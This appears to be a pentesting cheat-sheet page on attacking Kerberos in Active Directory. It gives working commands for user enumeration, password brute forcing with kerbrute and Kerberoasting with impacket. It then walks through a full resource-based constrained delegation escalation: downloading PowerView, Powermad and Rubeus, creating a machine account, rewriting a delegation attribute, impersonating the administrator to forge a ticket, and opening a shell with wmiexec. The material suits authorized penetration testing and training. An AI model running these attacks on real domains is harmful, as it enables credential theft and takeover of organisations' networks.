Exploit Notes

Kerberos Pentesting

Last modified: 2023-02-08

Active Directory Privilege Escalation Windows

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.

Enumeration

To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode *it's recommended to add this flag otherwise we cannot confirm if the user exist or not.
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce -v --dc 10.0.0.1 -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force user's password
kerbture bruteuser -v --dc 10.0.0.1 -d example.domain passwords.txt username

Also, see AS-REP Roasting to find password hashes.

Kerberoasting Attack

Kerberoasting is a attack technique to crack passwords in Active Directory using a credential already gathered.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt

Privilege Escalation with Kerberos

First off, download two PS scripts in local machine..

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1

Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
  1. Check User's Permission and Windows Versions

    Check if users are allowed to create a new computer object on the domain.

    Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
    
    # -------------------------
    # Result
    ms-ds-machineaccountquota: 10
    

    And check if the machine is at least Windows Server 2012.

    Get-DomainController
    
    # -------------------------
    # Result
    OSVersion: Windows Server 2022 Standard
    

    Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.

    hostname
    Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
    
    # ------------------
    # Result
    name msds-allowedtoactonbehalfofotheridentity
    ---- ----------------------------------------
    <HOSTNAME>   {1, 0, 4, 128...}
    
  2. Create a New Computer

    Now you can create a new computer object.

    New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
    Get-DomainComputer test01
    
    # ----------------------
    # Result (copy the id)
    objectsid: S-1-5-21-1677581083-3380853377-188903654-5103
    

    Create a new raw security descriptor.

    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<objectid-of-a-new-computer>)"
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)
    Get-DomainComputer <hostname> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
    
  3. Impersonate to Get a Ticket

    Download Rubeus.exe in local machine.

    wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
    

    Then upload it to the target machine and generate a RC4 hash.

    # Evil-WinRM
    upload Rubeus.exe
    .\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com
    
    # -------------------------
    # Result (copy the rc4 hash)
    rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4
    
    

    You can request a Kerberos ticket for a new machine account while impersonating an administrator.

    .\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname>.example.com /ptt
    
    # --------------
    # Result (copy the output long hash at the last)
    

    Generate a ticket

    [IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
    download ticket.kirbi
    
  4. Make the Ticket Usable and Use It

    Download “ticket_converter.py”.

    wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
    

    Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.

    kdestroy
    python3 ticket_converter.py ticket.kirbi ticket.ccache
    export KRB5CCNAME=ticket.ccache
    

    We can use the ticket to get a shell.

    impacket-wmiexec example.com/administrator@<hostname>.example.com -no-pass -k
    

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.